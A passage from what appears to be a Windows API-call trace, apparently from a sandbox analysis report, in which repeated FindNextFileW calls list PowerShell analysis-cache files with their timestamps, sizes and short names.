ftLastWriteTime.dwLowDateTime=0x697e45c2, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0x31e, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_68d3d05d-3fd6-414a-81ed-bbde5d989a56", cAlternateFileName="POB3DA~1")) returned 1 [0226.307] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a48ec1e, ftCreationTime.dwHighDateTime=0x1d93633, ftLastAccessTime.dwLowDateTime=0x6a48ec1e, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6a48ec1e, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0x4da, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_697e4215-0e61-48fc-97b6-49522d132431", cAlternateFileName="PO1B3B~1")) returned 1 [0226.307] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6782ed9a, ftCreationTime.dwHighDateTime=0x1d93633, ftLastAccessTime.dwLowDateTime=0x6782ed9a, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6782ed9a, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0x710, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_6bea9096-37d0-4e77-b7de-7ff84865f3cc", cAlternateFileName="POBF82~1")) returned 1 [0226.308] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47e0807c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x47e0807c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0xd58bbd16, ftLastWriteTime.dwHighDateTime=0x1d99d09, nFileSizeHigh=0x0, nFileSizeLow=0x662, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_6de40067-cd2a-4666-8cd9-870e0a588215", cAlternateFileName="POD9C8~1")) returned 1 [0226.308] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x47cd6d9c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0xd57d6ebf, ftLastWriteTime.dwHighDateTime=0x1d99d09, nFileSizeHigh=0x0, nFileSizeLow=0x4a3, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_6fe77092-4798-42ae-bda5-e7f822b580e9", cAlternateFileName="POWERS~1")) returned 1 [0226.308] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6929f6d3, ftCreationTime.dwHighDateTime=0x1d93633, ftLastAccessTime.dwLowDateTime=0x6929f6d3, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x692a4558, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0x93a, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_7670659f-b86b-4b08-98c3-1fe6a28ba23a", cAlternateFileName="PO4A4E~1")) returned 1 [0226.308] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6750dbfc, ftCreationTime.dwHighDateTime=0x1d93633, ftLastAccessTime.dwLowDateTime=0x6750dbfc, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6750dbfc, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0x74f, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_782e0b50-c4a7-460d-a5be-c3112cdfa685", cAlternateFileName="PO669F~1")) returned 1 [0226.309] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x675a664a, ftCreationTime.dwHighDateTime=0x1d93633, ftLastAccessTime.dwLowDateTime=0x675a664a, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x675a664a, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0x31a, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_78848cf8-29c5-4b3e-8e64-73e18028edff", cAlternateFileName="PO8A3C~1")) returned 1 [0226.309] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a6587e1, ftCreationTime.dwHighDateTime=0x1d93633, ftLastAccessTime.dwLowDateTime=0x6a6587e1, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6a6587e1, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0x64e, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_7a2aee14-152b-4fc0-a57b-e4979354b633", cAlternateFileName="PO0D0B~1")) returned 1 [0226.309] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67af24ea, ftCreationTime.dwHighDateTime=0x1d93633, ftLastAccessTime.dwLowDateTime=0x67af24ea, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x67af24ea, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0x1342, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_7c634d95-6d15-47e9-80e3-bdae55b262c8", cAlternateFileName="PODC04~1")) returned 1 [0226.309] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66ea569c, ftCreationTime.dwHighDateTime=0x1d93633, ftLastAccessTime.dwLowDateTime=0x66ea569c, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x66ecba8e, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0x13a1, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_878e1643-f6c1-4684-bbb0-f3ea8a237177", cAlternateFileName="PO663A~1")) returned 1 [0226.309] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb92b7c90, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0xb92b7c90, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0xb92b7c90, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x3ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_8bdd4f74-735f-4cbb-b944-fa23a05b2f05", cAlternateFileName="PO43BC~1")) returned 1 [0226.310] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6880f53c, ftCreationTime.dwHighDateTime=0x1d93633, ftLastAccessTime.dwLowDateTime=0x6880f53c, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6880f53c, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xdb1, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_9b37c529-de86-4171-bd63-2db6f9076df9", cAlternateFileName="PO9EE7~1")) returned 1 [0226.310] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68e9dbb8, ftCreationTime.dwHighDateTime=0x1d93633, ftLastAccessTime.dwLowDateTime=0x68e9dbb8, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x68e9dbb8, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0x4d7, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_9f3d095c-04b8-43e4-827c-ea955591301c", cAlternateFileName="POCF09~1")) returned 1 [0226.310] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb925899c, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0xb925899c, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0xb9259cc3, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x2b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_9fd22d45-e580-4e7f-ba2a-734dfe2d9a2c", cAlternateFileName="PO274D~1")) returned 1 [0226.310] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9341bea, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0xb9341bea, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0xb9341bea, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x5a1, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_a2539131-4889-4bfa-9cd2-9c1d6af613cf", cAlternateFileName="PO71AD~1")) returned 1 [0226.310] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ac9aa0f, ftCreationTime.dwHighDateTime=0x1d93633, ftLastAccessTime.dwLowDateTime=0x6ac9aa0f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac9aa0f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0x255, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_a6ae49f0-a86d-4569-a544-73099444ef84", cAlternateFileName="PO19E8~1")) returned 1 [0226.311] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6aa848f4, ftCreationTime.dwHighDateTime=0x1d93633, ftLastAccessTime.dwLowDateTime=0x6aa848f4, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6aa848f4, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0x6b5, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_af32ffb7-8816-4f06-8d43-29d7c004c9ba", cAlternateFileName="PO887D~1")) returned 1 [0226.311] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x661faee4, ftCreationTime.dwHighDateTime=0x1d93633, ftLastAccessTime.dwLowDateTime=0x661faee4, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x661faee4, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0x325, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_b26348fb-213f-4f36-865f-94d0590299bf", cAlternateFileName="POA1E0~1")) returned 1 [0226.311] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69450bc4, ftCreationTime.dwHighDateTime=0x1d93633, ftLastAccessTime.dwLowDateTime=0x69450bc4, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x69450bc4, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xab3, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_b6ece8f2-ac4b-48ef-b3e1-cc00ac2ef6ed", cAlternateFileName="PO0505~1")) returned 1 [0226.312] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6658e7c6, ftCreationTime.dwHighDateTime=0x1d93633, ftLastAccessTime.dwLowDateTime=0x6658e7c6, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6658e7c6, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0x1320, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_b93092c1-ca00-4748-98aa-e454b9f6bd5b", cAlternateFileName="POF056~1")) returned 1 [0226.312] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69797f4d, ftCreationTime.dwHighDateTime=0x1d93633, ftLastAccessTime.dwLowDateTime=0x69797f4d, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x69797f4d, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0x84c, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_bb0bf3e8-6bf6-4825-9576-5c9ab6654eb2", cAlternateFileName="POA048~1")) returned 1 [0226.312] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69041696, ftCreationTime.dwHighDateTime=0x1d93633, ftLastAccessTime.dwLowDateTime=0x69041696, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x69041696, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa6b, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_be72d563-9ed7-4ccb-b6c5-66a15b71dc5a", cAlternateFileName="POAB8E~1")) returned 1 [0226.312] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x672ab5f7, ftCreationTime.dwHighDateTime=0x1d93633, ftLastAccessTime.dwLowDateTime=0x672ab5f7, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x672ab5f7, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0x7be, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_bfab4979-bef8-4b3c-b045-b99868024702", cAlternateFileName="POFEEE~1")) returned 1 [0226.313] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66c69366, ftCreationTime.dwHighDateTime=0x1d93633, ftLastAccessTime.dwLowDateTime=0x66c69366, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x66c69366, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xb8b, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_c7eb4b69-9a99-4759-8ce7-7d58150c1910", cAlternateFileName="PO9BB5~1")) returned 1 [0226.313] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ab1d441, ftCreationTime.dwHighDateTime=0x1d93633, ftLastAccessTime.dwLowDateTime=0x6ab1d441, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ab1d441, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0x352, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_c9234349-f6cb-4269-94f5-9972bcdf8630", cAlternateFileName="PO591E~1")) returned 1 [0226.313] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67107df3, ftCreationTime.dwHighDateTime=0x1d93633, ftLastAccessTime.dwLowDateTime=0x67107df3, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x67107df3, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0x904, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_c9322d86-871f-44d4-b62e-baafb381b7ca", cAlternateFileName="PO69D7~1")) returned 1 [0226.313] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6901b2cc, ftCreationTime.dwHighDateTime=0x1d93633, ftLastAccessTime.dwLowDateTime=0x6901b2cc, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6901b2cc, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0x3ac, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_ca974151-a96a-40b1-82ba-e2341ff23031", cAlternateFileName="PO5AA6~1")) returned 1 [0226.313] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a2eb2cd, ftCreationTime.dwHighDateTime=0x1d93633, ftLastAccessTime.dwLowDateTime=0x6a2eb2cd, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6a2eb2cd, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0x402d, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_cbbe7254-d8c9-4b1e-8478-689965a1c5c3", cAlternateFileName="PO3301~1")) returned 1 [0226.314] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5ac33020, ftCreationTime.dwHighDateTime=0x1d93633, ftLastAccessTime.dwLowDateTime=0x5ac33020, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x5aee74b6, ftLastWriteTime.dwHighDateTime=0x1d9728d, nFileSizeHigh=0x0, nFileSizeLow=0x46d, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_cbd9994f-573e-4e2a-b89c-2361e1f3e1c9", cAlternateFileName="POF1C8~1")) returned 1 [0226.314] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47dbbb94, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x47dbbb94, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0xd5849612, ftLastWriteTime.dwHighDateTime=0x1d99d09, nFileSizeHigh=0x0, nFileSizeLow=0x717, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_cc38888a-7080-4220-9b7d-de7a9b2167ba", cAlternateFileName="POWERS~4")) returned 1 [0226.314] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x698a2f79, ftCreationTime.dwHighDateTime=0x1d93633, ftLastAccessTime.dwLowDateTime=0x698a2f79, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x698a2f79, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0x9fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_cc842f7e-096e-494f-abe6-2cfec65ec8c9", cAlternateFileName="POAFAD~1")) returned 1 [0226.314] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47d49400, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x47d49400, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0xd57d6ebf, ftLastWriteTime.dwHighDateTime=0x1d99d09, nFileSizeHigh=0x0, nFileSizeLow=0x2b07, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_da21122d-ae44-4f93-ba1d-c9a978ca5b20", cAlternateFileName="POWERS~3")) returned 1 [0226.314] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x683bd11a, ftCreationTime.dwHighDateTime=0x1d93633, ftLastAccessTime.dwLowDateTime=0x683bd11a, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x683bd11a, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0x2c7, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_da4bc035-2c1b-46d0-9a39-9a294fd08868", cAlternateFileName="PO1D3A~1")) returned 1 [0226.315] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x691b9e7d, ftCreationTime.dwHighDateTime=0x1d93633, ftLastAccessTime.dwLowDateTime=0x691b9e7d, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x691b9e7d, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0x1130, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_e43ac8c6-d15c-45c3-be08-dd89270d640c", cAlternateFileName="POECEA~1")) returned 1 [0226.315] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68e2b3b3, ftCreationTime.dwHighDateTime=0x1d93633, ftLastAccessTime.dwLowDateTime=0x68e2b3b3, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x68e2b3b3, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0x26af, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_e5890857-b2cb-49e5-ab9a-ea2b67c2b24c", cAlternateFileName="PO0A08~1")) returned 1 [0226.315] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68b56900, ftCreationTime.dwHighDateTime=0x1d93633, ftLastAccessTime.dwLowDateTime=0x68b56900, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x68b56900, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0x73b, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_e69e26be-07c1-43c1-a121-16bf37e9dfce", cAlternateFileName="PO1C17~1")) returned 1 [0226.315] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66e591d7, ftCreationTime.dwHighDateTime=0x1d93633, ftLastAccessTime.dwLowDateTime=0x66e591d7, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x66e591d7, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0x6eb, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_eb75c086-2f8d-4487-bdb8-55cfc0a6f6c4", cAlternateFileName="PO4FF0~1")) returned 1 [0226.315] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x678b5f0b, ftCreationTime.dwHighDateTime=0x1d93633, ftLastAccessTime.dwLowDateTime=0x678b5f0b, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x678b5f0b, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0x3e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_ece04130-8f57-4b2b-a42c-0289d56c3611", cAlternateFileName="POE301~1")) returned 1 [0226.316] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ac748d5, ftCreationTime.dwHighDateTime=0x1d93633, ftLastAccessTime.dwLowDateTime=0x6ac748d5, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac748d5, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0x2c3, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_ed4ce3ed-a8ca-434b-931d-f5d8ecf15f28", cAlternateFileName="PO8E20~1")) returned 1 [0226.316] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6abb5ba6, ftCreationTime.dwHighDateTime=0x1d93633, ftLastAccessTime.dwLowDateTime=0x6abb5ba6, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6abb5ba6, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0x339, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_ef90203d-9e41-42c9-a9d6-2a6b28ccfd49", cAlternateFileName="PO2D98~1")) returned 1 [0226.316] FindNextFileW (in: hFindFile=0x25b73cd1530, lpFindFileData=0x653ef8dc50 | out: lpFindFileData=0x653ef8dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6961a810, ftCreationTime.dwHighDateTime=0x1d93633, ftLastAccessTime.dwLowDateTime=0x6961a810, ftLastAccessTime.dwHighDateTime=0x1d93633, 